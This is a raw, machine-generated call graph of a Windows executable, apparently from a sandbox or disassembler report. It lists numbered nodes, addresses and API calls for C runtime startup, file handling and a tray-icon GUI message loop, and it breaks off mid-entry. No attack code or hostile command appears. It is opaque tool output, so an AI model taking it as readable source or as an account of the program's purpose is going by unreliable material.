97145 fa2e08 DecodePointer DecodePointer 97144->97145 97146 fa2de5 97145->97146 97147 fa2e35 97145->97147 97156 fa2e02 97146->97156 97147->97146 97205 fa8924 59 API calls __mbschr_l 97147->97205 97149 fa2e98 EncodePointer EncodePointer 97149->97146 97150 fa2e6c 97150->97146 97154 fa2e86 EncodePointer 97150->97154 97207 fa89e4 61 API calls 2 library calls 97150->97207 97151 fa2e47 97151->97149 97151->97150 97206 fa89e4 61 API calls 2 library calls 97151->97206 97154->97149 97155 fa2e80 97155->97146 97155->97154 97208 fa33a0 97156->97208 97160 fa9daf EnterCriticalSection 97159->97160 97161 fa9d9c 97159->97161 97160->97144 97166 fa9e13 97161->97166 97163 fa9da2 97163->97160 97190 fa3235 58 API calls 3 library calls 97163->97190 97167 fa9e1f _flsall 97166->97167 97168 fa9e28 97167->97168 97169 fa9e40 97167->97169 97191 faa2eb 58 API calls __NMSG_WRITE 97168->97191 97177 fa9e61 _flsall 97169->97177 97194 fa899d 58 API calls 2 library calls 97169->97194 97171 fa9e2d 97192 faa348 58 API calls 5 library calls 97171->97192 97173 fa9e55 97175 fa9e6b 97173->97175 97176 fa9e5c 97173->97176 97180 fa9d8b __lock 58 API calls 97175->97180 97195 fa8ca8 58 API calls __getptd_noexit 97176->97195 97177->97163 97178 fa9e34 97193 fa321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97178->97193 97182 fa9e72 97180->97182 97184 fa9e7f 97182->97184 97185 fa9e97 97182->97185 97196 fa9fab InitializeCriticalSectionAndSpinCount 97184->97196 97197 fa2ed5 97185->97197 97188 fa9e8b 97203 fa9eb3 LeaveCriticalSection _doexit 97188->97203 97191->97171 97192->97178 97194->97173 97195->97177 97196->97188 97198 fa2ede RtlFreeHeap 97197->97198 97202 fa2f07 _free 97197->97202 97199 fa2ef3 97198->97199 97198->97202 97204 fa8ca8 58 API calls __getptd_noexit 97199->97204 97201 fa2ef9 GetLastError 97201->97202 97202->97188 97203->97177 97204->97201 97205->97151 97206->97150 97207->97155 97211 fa9ef5 LeaveCriticalSection 97208->97211 97210 fa2e07 97210->97141 97211->97210 97212 fa7dd3 97213 fa7ddf _flsall 97212->97213 97249 fa9f88 GetStartupInfoW 97213->97249 97215 fa7de4 97251 fa8cfc GetProcessHeap 97215->97251 97217 fa7e3c 97218 fa7e47 97217->97218 97334 fa7f23 58 API calls 3 library calls 97217->97334 97252 fa9c66 97218->97252 97221 fa7e4d 97222 fa7e58 __RTC_Initialize 97221->97222 97335 fa7f23 58 API calls 3 library calls 97221->97335 97273 fad752 97222->97273 97225 fa7e67 97226 fa7e73 GetCommandLineW 97225->97226 97336 fa7f23 58 API calls 3 library calls 97225->97336 97292 fb50a3 GetEnvironmentStringsW 97226->97292 97229 fa7e72 97229->97226 97232 fa7e8d 97233 fa7e98 97232->97233 97337 fa3235 58 API calls 3 library calls 97232->97337 97302 fb4ed8 97233->97302 97236 fa7e9e 97237 fa7ea9 97236->97237 97338 fa3235 58 API calls 3 library calls 97236->97338 97316 fa326f 97237->97316 97240 fa7eb1 97241 fa7ebc __wwincmdln 97240->97241 97339 fa3235 58 API calls 3 library calls 97240->97339 97322 f8492e 97241->97322 97244 fa7ed0 97245 fa7edf 97244->97245 97340 fa34d8 58 API calls _doexit 97244->97340 97341 fa3260 58 API calls _doexit 97245->97341 97248 fa7ee4 _flsall 97250 fa9f9e 97249->97250 97250->97215 97251->97217 97342 fa3307 36 API calls 2 library calls 97252->97342 97254 fa9c6b 97343 fa9ebc InitializeCriticalSectionAndSpinCount __mtinitlocks 97254->97343 97256 fa9c70 97257 fa9c74 97256->97257 97345 fa9f0a TlsAlloc 97256->97345 97344 fa9cdc 61 API calls 2 library calls 97257->97344 97260 fa9c79 97260->97221 97261 fa9c86 97261->97257 97262 fa9c91 97261->97262 97346 fa8955 97262->97346 97265 fa9cd3 97354 fa9cdc 61 API calls 2 library calls 97265->97354 97268 fa9cb2 97268->97265 97270 fa9cb8 97268->97270 97269 fa9cd8 97269->97221 97353 fa9bb3 58 API calls 4 library calls 97270->97353 97272 fa9cc0 GetCurrentThreadId 97272->97221 97274 fad75e _flsall 97273->97274 97275 fa9d8b __lock 58 API calls 97274->97275 97276 fad765 97275->97276 97277 fa8955 __calloc_crt 58 API calls 97276->97277 97278 fad776 97277->97278 97279 fad7e1 GetStartupInfoW 97278->97279 97280 fad781 _flsall @_EH4_CallFilterFunc@8 97278->97280 97286 fad7f6 97279->97286 97287 fad925 97279->97287 97280->97225 97281 fad9ed 97368 fad9fd LeaveCriticalSection _doexit 97281->97368 97283 fa8955 __calloc_crt 58 API calls 97283->97286 97284 fad972 GetStdHandle 97284->97287 97285 fad985 GetFileType 97285->97287 97286->97283 97286->97287 97289 fad844 97286->97289 97287->97281 97287->97284 97287->97285 97367 fa9fab InitializeCriticalSectionAndSpinCount 97287->97367 97288 fad878 GetFileType 97288->97289 97289->97287 97289->97288 97366 fa9fab InitializeCriticalSectionAndSpinCount 97289->97366 97293 fa7e83 97292->97293 97294 fb50b4 97292->97294 97298 fb4c9b GetModuleFileNameW 97293->97298 97369 fa899d 58 API calls 2 library calls 97294->97369 97296 fb50da _memmove 97297 fb50f0 FreeEnvironmentStringsW 97296->97297 97297->97293 97299 fb4ccf _wparse_cmdline 97298->97299 97301 fb4d0f _wparse_cmdline 97299->97301 97370 fa899d 58 API calls 2 library calls 97299->97370 97301->97232 97303 fb4ee9 97302->97303 97304 fb4ef1 __NMSG_WRITE 97302->97304 97303->97236 97305 fa8955 __calloc_crt 58 API calls 97304->97305 97308 fb4f1a __NMSG_WRITE 97305->97308 97306 fb4f71 97307 fa2ed5 _free 58 API calls 97306->97307 97307->97303 97308->97303 97308->97306 97309 fa8955 __calloc_crt 58 API calls 97308->97309 97310 fb4f96 97308->97310 97313 fb4fad 97308->97313 97371 fb4787 58 API calls __mbschr_l 97308->97371 97309->97308 97312 fa2ed5 _free 58 API calls 97310->97312 97312->97303 97372 fa8f46 IsProcessorFeaturePresent 97313->97372 97315 fb4fb9 97315->97236 97318 fa327b __IsNonwritableInCurrentImage 97316->97318 97395 faa651 97318->97395 97319 fa3299 __initterm_e 97320 fa2ec0 __cinit 67 API calls 97319->97320 97321 fa32b8 _doexit __IsNonwritableInCurrentImage 97319->97321 97320->97321 97321->97240 97323 f84948 97322->97323 97333 f849e7 97322->97333 97324 f84982 IsThemeActive 97323->97324 97398 fa34ec 97324->97398 97328 f849ae 97410 f84a5b SystemParametersInfoW SystemParametersInfoW 97328->97410 97330 f849ba 97411 f83b4c 97330->97411 97332 f849c2 SystemParametersInfoW 97332->97333 97333->97244 97334->97218 97335->97222 97336->97229 97340->97245 97341->97248 97342->97254 97343->97256 97344->97260 97345->97261 97347 fa895c 97346->97347 97349 fa8997 97347->97349 97351 fa897a 97347->97351 97355 fb5376 97347->97355 97349->97265 97352 fa9f66 TlsSetValue 97349->97352 97351->97347 97351->97349 97363 faa2b2 Sleep 97351->97363 97352->97268 97353->97272 97354->97269 97356 fb5381 97355->97356 97362 fb539c 97355->97362 97357 fb538d 97356->97357 97356->97362 97364 fa8ca8 58 API calls __getptd_noexit 97357->97364 97359 fb53ac HeapAlloc 97360 fb5392 97359->97360 97359->97362 97360->97347 97362->97359 97362->97360 97365 fa3521 DecodePointer 97362->97365 97363->97351 97364->97360 97365->97362 97366->97289 97367->97287 97368->97280 97369->97296 97370->97301 97371->97308 97373 fa8f51 97372->97373 97378 fa8dd9 97373->97378 97377 fa8f6c 97377->97315 97379 fa8df3 _memset __call_reportfault 97378->97379 97380 fa8e13 IsDebuggerPresent 97379->97380 97386 faa2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 97380->97386 97383 fa8ed7 __call_reportfault 97387 fac776 97383->97387 97384 fa8efa 97385 faa2c0 GetCurrentProcess TerminateProcess 97384->97385 97385->97377 97386->97383 97388 fac77e 97387->97388 97389 fac780 IsProcessorFeaturePresent 97387->97389 97388->97384 97391 fb5a8a 97389->97391 97394 fb5a39 5 API calls 2 library calls 97391->97394 97393 fb5b6d 97393->97384 97394->97393 97396 faa654 EncodePointer 97395->97396 97396->97396 97397 faa66e 97396->97397 97397->97319 97399 fa9d8b __lock 58 API calls 97398->97399 97400 fa34f7 DecodePointer EncodePointer 97399->97400 97463 fa9ef5 LeaveCriticalSection 97400->97463 97402 f849a7 97403 fa3554 97402->97403 97404 fa3578 97403->97404 97405 fa355e 97403->97405 97404->97328 97405->97404 97464 fa8ca8 58 API calls __getptd_noexit 97405->97464 97407 fa3568 97465 fa8f36 9 API calls __mbschr_l 97407->97465 97409 fa3573 97409->97328 97410->97330 97412 f83b59 __write_nolock 97411->97412 97413 f877c7 59 API calls 97412->97413 97414 f83b63 GetCurrentDirectoryW 97413->97414 97466 f83778 97414->97466 97416 f83b8c IsDebuggerPresent 97417 f83b9a 97416->97417 97418 fbd3dd MessageBoxA 97416->97418 97420 fbd3f7 97417->97420 97421 f83bb7 97417->97421 97453 f83c73 97417->97453 97418->97420 97419 f83c7a SetCurrentDirectoryW 97424 f83c87 Mailbox 97419->97424 97676 f87373 59 API calls Mailbox 97420->97676 97547 f873e5 97421->97547 97424->97332 97425 fbd407 97430 fbd41d SetCurrentDirectoryW 97425->97430 97427 f83bd5 GetFullPathNameW 97428 f87d2c 59 API calls 97427->97428 97429 f83c10 97428->97429 97563 f90a8d 97429->97563 97430->97424 97433 f83c2e 97434 f83c38 97433->97434 97677 fe4a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 97433->97677 97579 f83a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97434->97579 97438 fbd43a 97438->97434 97440 fbd44b 97438->97440 97442 f84864 61 API calls 97440->97442 97441 f83c42 97443 f83c55 97441->97443 97587 f843db 97441->97587 97444 fbd453 97442->97444 97598 f90b30 97443->97598 97447 f87f41 59 API calls 97444->97447 97449 fbd460 97447->97449 97448 f83c60 97448->97453 97675 f844cb Shell_NotifyIconW _memset 97448->97675 97450 fbd46a 97449->97450 97451 fbd48f 97449->97451 97454 f87e0b 59 API calls 97450->97454 97455 f87e0b 59 API calls 97451->97455 97453->97419 97456 fbd475 97454->97456 97457 fbd48b GetForegroundWindow ShellExecuteW 97455->97457 97678 f87c8e 97456->97678 97460 fbd4bf Mailbox 97457->97460 97460->97453 97462 f87e0b 59 API calls 97462->97457 97463->97402 97464->97407 97465->97409 97467 f877c7 59 API calls 97466->97467 97468 f8378e 97467->97468 97687 f83d43 97468->97687 97470 f837ac 97471 f84864 61 API calls 97470->97471 97472 f837c0 97471->97472 97473 f87f41 59 API calls 97472->97473 97474 f837cd 97473->97474 97701 f84f3d 97474->97701 97477 fbd2de 97772 fe9604 97477->97772 97478 f837ee Mailbox 97725 f881a7 97478->97725 97481 fbd2fd 97484 fa2ed5 _free 58 API calls 97481->97484 97486 fbd30a 97484->97486 97488 f84faa 84 API calls 97486->97488 97490 fbd313 97488->97490 97494 f83ee2 59 API calls 97490->97494 97491 f87f41 59 API calls 97492 f8381a 97491->97492 97732 f88620 97492->97732 97496 fbd32e 97494->97496 97495 f8382c Mailbox 97497 f87f41 59 API calls 97495->97497 97498 f83ee2 59 API calls 97496->97498 97499 f83852 97497->97499 97500 fbd34a 97498->97500 97501 f88620 69 API calls 97499->97501 97503 f84864 61 API calls 97500->97503 97502 f83861 Mailbox 97501->97502 97507 f877c7 59 API calls 97502->97507 97504 fbd36f 97503->97504 97505 f83ee2 59 API calls 97504->97505 97506 fbd37b 97505->97506 97508 f881a7 59 API calls 97506->97508 97509 f8387f 97507->97509 97510 fbd389 97508->97510 97736 f83ee2 97509->97736 97512 f83ee2 59 API calls 97510->97512 97515 fbd398 97512->97515 97520 f881a7 59 API calls 97515->97520 97516 f83899 97516->97490 97517 f838a3 97516->97517 97518 fa307d _W_store_winword 60 API calls 97517->97518 97519 f838ae 97518->97519 97519->97496 97521 f838b8 97519->97521 97522 fbd3ba 97520->97522 97523 fa307d _W_store_winword 60 API calls 97521->97523 97524 f83ee2 59 API calls 97522->97524 97525 f838c3 97523->97525 97526 fbd3c7 97524->97526 97525->97500 97527 f838cd 97525->97527 97526->97526 97528 fa307d _W_store_winword 60 API calls 97527->97528 97529 f838d8 97528->97529 97529->97515 97530 f83919 97529->97530 97532 f83ee2 59 API calls 97529->97532 97530->97515 97531 f83926 97530->97531 97752 f8942e 97531->97752 97534 f838fc 97532->97534 97536 f881a7 59 API calls 97534->97536 97537 f8390a 97536->97537 97539 f83ee2 59 API calls 97537->97539 97539->97530 97542 f893ea 59 API calls 97544 f83961 97542->97544 97543 f89040 60 API calls 97543->97544 97544->97542 97544->97543 97545 f83ee2 59 API calls 97544->97545 97546 f839a7 Mailbox 97544->97546 97545->97544 97546->97416 97548 f873f2 __write_nolock 97547->97548 97549 fbed7b _memset 97548->97549 97550 f8740b 97548->97550 97553 fbed97 GetOpenFileNameW 97549->97553 97551 f848ae 60 API calls 97550->97551 97552 f87414 97551->97552 98395 fa0911 97552->98395 97554 fbede6 97553->97554 97556 f87d2c 59 API calls 97554->97556 97558 fbedfb 97556->97558 97558->97558 97560 f87429 98413 f869ca 97560->98413 97564 f90a9a __write_nolock 97563->97564 98665 f86ee0 97564->98665 97566 f90a9f 97567 f83c26 97566->97567 98676 f912fe 89 API calls 97566->98676 97567->97425 97567->97433 97569 f90aac 97569->97567 98677 f94047 91 API calls Mailbox 97569->98677 97571 f90ab5 97571->97567 97572 f90ab9 GetFullPathNameW 97571->97572 97573 f87d2c 59 API calls 97572->97573 97574 f90ae5 97573->97574 97575 f87d2c 59 API calls 97574->97575 97576 f90af2 97575->97576 97577 fc5004 _wcscat 97576->97577 97578 f87d2c 59 API calls 97576->97578 97578->97567 97580 fbd3cc 97579->97580 97581 f83ac2 LoadImageW RegisterClassExW 97579->97581 98681 f848fe LoadImageW EnumResourceNamesW 97580->98681 98680 f83041 7 API calls 97581->98680 97584 f83b46 97586 f839e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97584->97586 97585 fbd3d5 97586->97441 97588 f84406 _memset 97587->97588 98682 f84213 97588->98682 97592 f8448b 97593 f844c1 Shell_NotifyIconW 97592->97593 97594 f844a5 Shell_NotifyIconW 97592->97594 97595 f844b3 97593->97595 97594->97595 98686 f8410d 97595->98686 97597 f844ba 97597->97443 97599 fc501c 97598->97599 97613 f90b55 97598->97613 98855 fe9ed4 89 API calls 4 library calls 97599->98855 97601 f90e44 97602 f90e5a 97601->97602 98852 f911d0 10 API calls Mailbox 97601->98852 97602->97448 97604 f91044 97604->97602 97606 f91051 97604->97606 98853 f911f3 341 API calls Mailbox 97606->98853 97607 f90bab PeekMessageW 97644 f90b65 Mailbox 97607->97644 97609 f91058 LockWindowUpdate DestroyWindow GetMessageW 97609->97602 97612 f9108a 97609->97612 97611 fc51da Sleep 97611->97644 97614 fc5fb1 TranslateMessage DispatchMessageW GetMessageW 97612->97614 97613->97644 98856 f89fbd 60 API calls 97613->98856 98857 fd669f 341 API calls 97613->98857 97614->97614 97616 fc5fe1 97614->97616 97616->97602 97617 f90fa3 PeekMessageW 97617->97644 97618 f91005 TranslateMessage DispatchMessageW 97618->97617 97619 fc50a9 TranslateAcceleratorW 97619->97617 97619->97644 97620 f89fbd 60 API calls 97620->97644 97621 fc5b78 WaitForSingleObject 97625 fc5b95 GetExitCodeProcess CloseHandle 97621->97625 97621->97644 97623 fa0f36 59 API calls Mailbox 97623->97644 97624 f90e73 timeGetTime 97624->97644 97629 f910f5 97625->97629 97626 f90fbf Sleep 97647 f90fd0 Mailbox 97626->97647 97627 f881a7 59 API calls 97627->97644 97628 f877c7 59 API calls 97628->97647 97629->97448 97630 fc5e51 Sleep 97630->97647 97632 fa034a timeGetTime 97632->97647 97634 f910ae timeGetTime 98854 f89fbd 60 API calls 97634->98854 97637 fc5ee8 GetExitCodeProcess 97641 fc5efe WaitForSingleObject 97637->97641 97642 fc5f14 CloseHandle 97637->97642 97639 1005f8e 110 API calls 97639->97647 97640 f8b93d 109 API calls 97640->97647 97641->97642 97641->97644 97642->97647 97644->97601 97644->97607 97644->97611 97644->97617 97644->97618 97644->97619 97644->97620 97644->97621 97644->97623 97644->97624 97644->97626 97644->97627 97644->97629 97644->97630 97644->97634 97644->97647 97660 fe9ed4 89 API calls 97644->97660 97662 f89df0 59 API calls Mailbox 97644->97662 97663 f8b89c 314 API calls 97644->97663 97664 f8a000 314 API calls 97644->97664 97665 f88620 69 API calls 97644->97665 97667 fd63f2 59 API calls Mailbox 97644->97667 97668 f88b13 69 API calls 97644->97668 97669 fc592e VariantClear 97644->97669 97670 fc59c4 VariantClear 97644->97670 97671 f88e34 59 API calls Mailbox 97644->97671 97672 fc5772 VariantClear 97644->97672 97673 fd71e5 59 API calls 97644->97673 97674 f87f41 59 API calls 97644->97674 98714 f8e580 97644->98714 98721 f8e800 97644->98721 98752 f8f5c0 97644->98752 98771 f8fe40 97644->98771 98851 f831ce IsDialogMessageW GetClassLongW 97644->98851 98858 1006081 59 API calls 97644->98858 98859 fe9abe 59 API calls Mailbox 97644->98859 98860 fdd801 59 API calls 97644->98860 98861 f89997 97644->98861 98879 fd6363 59 API calls 2 library calls 97644->98879 98880 f88561 59 API calls 97644->98880 98881 f8843f 59 API calls Mailbox 97644->98881 97646 fc5bcd 97646->97629 97647->97628 97647->97629 97647->97632 97647->97637 97647->97639 97647->97640 97647->97644 97647->97646 97648 fc53d1 Sleep 97647->97648 97649 fc5f70 Sleep 97647->97649 97651 f87f41 59 API calls 97647->97651 98882 fe2700 60 API calls 97647->98882 98883 f89fbd 60 API calls 97647->98883 98884 f88b13 69 API calls Mailbox 97647->98884 98885 f8b89c 341 API calls 97647->98885 98886 fd6830 60 API calls 97647->98886 98887 fe52eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97647->98887 98888 fe3c99 66 API calls Mailbox 97647->98888 97648->97644 97649->97644 97651->97647 97660->97644 97662->97644 97663->97644 97664->97644 97665->97644 97667->97644 97668->97644 97669->97644 97670->97644 97671->97644 97672->97644 97673->97644 97674->97644 97675->97453 97676->97425 97677->97438 97679 f87ca0 97678->97679 97680 fbefc4 97678->97680 99355 f87bb1 97679->99355 99361 fd7f03 59 API calls _memmove 97680->99361 97683 f87cac 97683->97462 97684 fbefce 97685 f881a7 59 API calls 97684->97685 97686 fbefd6 Mailbox 97685->97686 97688 f83d50 __write_nolock 97687->97688 97689 f87d2c 59 API calls 97688->97689 97695 f83eb6 Mailbox 97688->97695 97691 f83d82 97689->97691 97698 f83db8 Mailbox 97691->97698 97813 f87b52 97691->97813 97692 f87b52 59 API calls 97692->97698 97693 f83e89 97694 f87f41 59 API calls 97693->97694 97693->97695 97697 f83eaa 97694->97697 97695->97470 97696 f87f41 59 API calls 97696->97698 97699 f83f84 59 API calls 97697->97699 97698->97692 97698->97693 97698->97695 97698->97696 97700 f83f84 59 API calls 97698->97700 97699->97695 97700->97698 97816 f84d13 97701->97816 97706 f84f68 LoadLibraryExW 97826 f84cc8 97706->97826 97707 fbdc3f 97708 f84faa 84 API calls 97707->97708 97711 fbdc46 97708->97711 97713 f84cc8 3 API calls 97711->97713 97715 fbdc4e 97713->97715 97714 f84f8f 97714->97715 97716 f84f9b 97714->97716 97852 f8506b 97715->97852 97717 f84faa 84 API calls 97716->97717 97719 f837e6 97717->97719 97719->97477 97719->97478 97722 fbdc75 97860 f85027 97722->97860 97724 fbdc82 97726 f83801 97725->97726 97727 f881b2 97725->97727 97729 f893ea 97726->97729 98111 f880d7 97727->98111 97730 fa0f36 Mailbox 59 API calls 97729->97730 97731 f8380d 97730->97731 97731->97491 97733 f8862b 97732->97733 97735 f88652 97733->97735 98115 f88b13 69 API calls Mailbox 97733->98115 97735->97495 97737 f83eec 97736->97737 97738 f83f05 97736->97738 97739 f881a7 59 API calls 97737->97739 97740 f87d2c 59 API calls 97738->97740 97741 f8388b 97739->97741 97740->97741 97742 fa307d 97741->97742 97743 fa3089 97742->97743 97744 fa30fe 97742->97744 97751 fa30ae 97743->97751 98116 fa8ca8 58 API calls __getptd_noexit 97743->98116 98118 fa3110 60 API calls 3 library calls 97744->98118 97746 fa310b 97746->97516 97748 fa3095 98117 fa8f36 9 API calls __mbschr_l 97748->98117 97750 fa30a0 97750->97516 97751->97516 97753 f89436 97752->97753 97754 fa0f36 Mailbox 59 API calls 97753->97754 97755 f89444 97754->97755 97756 f83936 97755->97756 98119 f8935c 59 API calls Mailbox 97755->98119 97758 f891b0 97756->97758 98120 f892c0 97758->98120 97760 f891bf 97761 fa0f36 Mailbox 59 API calls 97760->97761 97762 f83944 97760->97762 97761->97762 97763 f89040 97762->97763 97764 fbf4d5 97763->97764 97769 f89057 97763->97769 97764->97769 98130 f88d3b 59 API calls Mailbox 97764->98130 97766 f89158 97770 fa0f36 Mailbox 59 API calls 97766->97770 97767 f891a0 98129 f89e9c 60 API calls Mailbox 97767->98129 97769->97766 97769->97767 97771 f8915f 97769->97771 97770->97771 97771->97544 97773 f85045 85 API calls 97772->97773 97774 fe9673 97773->97774 98131 fe97dd 97774->98131 97777 f8506b 74 API calls 97778 fe96a0 97777->97778 97779 f8506b 74 API calls 97778->97779 97780 fe96b0 97779->97780 97781 f8506b 74 API calls 97780->97781 97782 fe96cb 97781->97782 97783 f8506b 74 API calls 97782->97783 97784 fe96e6 97783->97784 97785 f85045 85 API calls 97784->97785 97786 fe96fd 97785->97786 97787 fa588c __crtCompareStringA_stat 58 API calls 97786->97787 97788 fe9704 97787->97788 97789 fa588c __crtCompareStringA_stat 58 API calls 97788->97789 97790 fe970e 97789->97790 97791 f8506b 74 API calls 97790->97791 97792 fe9722 97791->97792 97793 fe91b2 GetSystemTimeAsFileTime 97792->97793 97794 fe9735 97793->97794 97795 fe975f 97794->97795 97796 fe974a 97794->97796 97797 fe97c4 97795->97797 97798 fe9765 97795->97798 97799 fa2ed5 _free 58 API calls 97796->97799 97801 fa2ed5 _free 58 API calls 97797->97801 98137 fe8baf 116 API calls __fcloseall 97798->98137 97802 fe9750 97799->97802 97805 fbd2f1 97801->97805 97803 fa2ed5 _free 58 API calls 97802->97803 97803->97805 97804 fe97bc 97806 fa2ed5 _free 58 API calls 97804->97806 97805->97481 97807 f84faa 97805->97807 97806->97805 97808 f84fbb 97807->97808 97809 f84fb4 97807->97809 97811 f84fca 97808->97811 97812 f84fdb FreeLibrary 97808->97812 98138 fa5516 97809->98138 97811->97481 97812->97811 97814 f87faf 59 API calls 97813->97814 97815 f87b5d 97814->97815 97815->97691 97865 f84d61 97816->97865 97819 f84d3a 97821 f84d4a FreeLibrary 97819->97821 97822 f84d53 97819->97822 97820 f84d61 2 API calls 97820->97819 97821->97822 97823 fa53cb 97822->97823 97869 fa53e0 97823->97869 97825 f84f5c 97825->97706 97825->97707 98029 f84d94 97826->98029 97829 f84ced 97830 f84d08 97829->97830 97831 f84cff FreeLibrary 97829->97831 97833 f84dd0 97830->97833 97831->97830 97832 f84d94 2 API calls 97832->97829 97834 fa0f36 Mailbox 59 API calls 97833->97834 97835 f84de5 97834->97835 97836 f8538e 59 API calls 97835->97836 97837 f84df1 _memmove 97836->97837 97838 f84e2c 97837->97838 97840 f84ee9 97837->97840 97841 f84f21 97837->97841 97839 f85027 69 API calls 97838->97839 97848 f84e35 97839->97848 98033 f84fe9 CreateStreamOnHGlobal 97840->98033 98044 fe99c4 95 API calls 97841->98044 97844 f8506b 74 API calls 97844->97848 97846 f84ec9 97846->97714 97847 fbdc00 97849 f85045 85 API calls 97847->97849 97848->97844 97848->97846 97848->97847 98039 f85045 97848->98039 97850 fbdc14 97849->97850 97851 f8506b 74 API calls 97850->97851 97851->97846 97853 f8507d 97852->97853 97854 fbdd26 97852->97854 98068 fa5752 97853->98068 97857 fe91b2 98088 fe9008 97857->98088 97859 fe91c8 97859->97722 97861 fbdce9 97860->97861 97862 f85036 97860->97862 98093 fa5dd0 97862->98093 97864 f8503e 97864->97724 97866 f84d2e 97865->97866 97867 f84d6a LoadLibraryA 97865->97867 97866->97819 97866->97820 97867->97866 97868 f84d7b GetProcAddress 97867->97868 97868->97866 97872 fa53ec _flsall 97869->97872 97870 fa53ff 97918 fa8ca8 58 API calls __getptd_noexit 97870->97918 97872->97870 97874 fa5430 97872->97874 97873 fa5404 97919 fa8f36 9 API calls __mbschr_l 97873->97919 97888 fb0668 97874->97888 97877 fa5435 97878 fa544b 97877->97878 97879 fa543e 97877->97879 97881 fa5475 97878->97881 97882 fa5455 97878->97882 97920 fa8ca8 58 API calls __getptd_noexit 97879->97920 97903 fb0787 97881->97903 97921 fa8ca8 58 API calls __getptd_noexit 97882->97921 97883 fa540f _flsall @_EH4_CallFilterFunc@8 97883->97825 97889 fb0674 _flsall 97888->97889 97890 fa9d8b __lock 58 API calls 97889->97890 97891 fb0682 97890->97891 97892 fb06fd 97891->97892 97898 fa9e13 __mtinitlocknum 58 API calls 97891->97898 97901 fb06f6 97891->97901 97926 fa6dcd 59 API calls __lock 97891->97926 97927 fa6e37 LeaveCriticalSection LeaveCriticalSection _doexit 97891->97927 97928 fa899d 58 API calls 2 library calls 97892->97928 97895 fb0704 97895->97901 97929 fa9fab InitializeCriticalSectionAndSpinCount 97895->97929 97896 fb0773 _flsall 97896->97877 97898->97891 97900 fb072a EnterCriticalSection 97900->97901 97923 fb077e 97901->97923 97904 fb07a7 __wopenfile 97903->97904 97905 fb07c1 97904->97905 97917 fb097c 97904->97917 97936 fa394b 60 API calls 2 library calls 97904->97936 97934 fa8ca8 58 API calls __getptd_noexit 97905->97934 97907 fb07c6 97935 fa8f36 9 API calls __mbschr_l 97907->97935 97909 fb09df 97931 fb8721 97909->97931 97910 fa5480 97922 fa54a2 LeaveCriticalSection LeaveCriticalSection _fprintf 97910->97922 97913 fb0975 97913->97917 97937 fa394b 60 API calls 2 library calls 97913->97937 97915 fb0994 97915->97917 97938 fa394b 60 API calls 2 library calls 97915->97938 97917->97905 97917->97909 97918->97873 97919->97883 97920->97883 97921->97883 97922->97883 97930 fa9ef5 LeaveCriticalSection 97923->97930 97925 fb0785 97925->97896 97926->97891 97927->97891 97928->97895 97929->97900 97930->97925 97939 fb7f05 97931->97939 97933 fb873a 97933->97910 97934->97907 97935->97910 97936->97913 97937->97915 97938->97917 97940 fb7f11 _flsall 97939->97940 97941 fb7f27 97940->97941 97944 fb7f5d 97940->97944 98026 fa8ca8 58 API calls __getptd_noexit 97941->98026 97943 fb7f2c 98027 fa8f36 9 API calls __mbschr_l 97943->98027 97950 fb7fce 97944->97950 97947 fb7f79 98028 fb7fa2 LeaveCriticalSection __unlock_fhandle 97947->98028 97949 fb7f36 _flsall 97949->97933 97951 fb7fee 97950->97951 97952 fa465a __wsopen_nolock 58 API calls 97951->97952 97955 fb800a 97952->97955 97953 fa8f46 __invoke_watson 8 API calls 97954 fb8720 97953->97954 97956 fb7f05 __wsopen_helper 103 API calls 97954->97956 97957 fb8044 97955->97957 97960 fb8067 97955->97960 97973 fb8141 97955->97973 97958 fb873a 97956->97958 97959 fa8c74 __set_osfhnd 58 API calls 97957->97959 97958->97947 97961 fb8049 97959->97961 97964 fb8125 97960->97964 97971 fb8103 97960->97971 97962 fa8ca8 __mbschr_l 58 API calls 97961->97962 97963 fb8056 97962->97963 97965 fa8f36 __mbschr_l 9 API calls 97963->97965 97966 fa8c74 __set_osfhnd 58 API calls 97964->97966 97967 fb8060 97965->97967 97968 fb812a 97966->97968 97967->97947 97969 fa8ca8 __mbschr_l 58 API calls 97968->97969 97970 fb8137 97969->97970 97972 fa8f36 __mbschr_l 9 API calls 97970->97972 97974 fad414 __alloc_osfhnd 61 API calls 97971->97974 97972->97973 97973->97953 97975 fb81d1 97974->97975 97976 fb81db 97975->97976 97977 fb81fe 97975->97977 97979 fa8c74 __set_osfhnd 58 API calls 97976->97979 97978 fb7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97977->97978 97988 fb8220 97978->97988 97980 fb81e0 97979->97980 97982 fa8ca8 __mbschr_l 58 API calls 97980->97982 97981 fb829e GetFileType 97985 fb82eb 97981->97985 97986 fb82a9 GetLastError 97981->97986 97984 fb81ea 97982->97984 97983 fb826c GetLastError 97989 fa8c87 __dosmaperr 58 API calls 97983->97989 97990 fa8ca8 __mbschr_l 58 API calls 97984->97990 97996 fad6aa __set_osfhnd 59 API calls 97985->97996 97987 fa8c87 __dosmaperr 58 API calls 97986->97987 97991 fb82d0 CloseHandle 97987->97991 97988->97981 97988->97983 97992 fb7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97988->97992 97993 fb8291 97989->97993 97990->97967 97991->97993 97994 fb82de 97991->97994 97995 fb8261 97992->97995 97998 fa8ca8 __mbschr_l 58 API calls 97993->97998 97997 fa8ca8 __mbschr_l 58 API calls 97994->97997 97995->97981 97995->97983 98001 fb8309 97996->98001 97999 fb82e3 97997->97999 97998->97973 97999->97993 98000 fb84c4 98000->97973 98004 fb8697 CloseHandle 98000->98004 98001->98000 98002 fb1a41 __lseeki64_nolock 60 API calls 98001->98002 98017 fb838a 98001->98017 98003 fb8373 98002->98003 98007 fa8c74 __set_osfhnd 58 API calls 98003->98007 98022 fb8392 98003->98022 98005 fb7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98004->98005 98006 fb86be 98005->98006 98009 fb854e 98006->98009 98010 fb86c6 GetLastError 98006->98010 98007->98017 98008 fb0fdb 70 API calls __read_nolock 98008->98022 98009->97973 98011 fa8c87 __dosmaperr 58 API calls 98010->98011 98012 fb86d2 98011->98012 98014 fad5bd __free_osfhnd 59 API calls 98012->98014 98013 fb0c5d __close_nolock 61 API calls 98013->98022 98014->98009 98015 fb9922 __chsize_nolock 82 API calls 98015->98022 98016 fada06 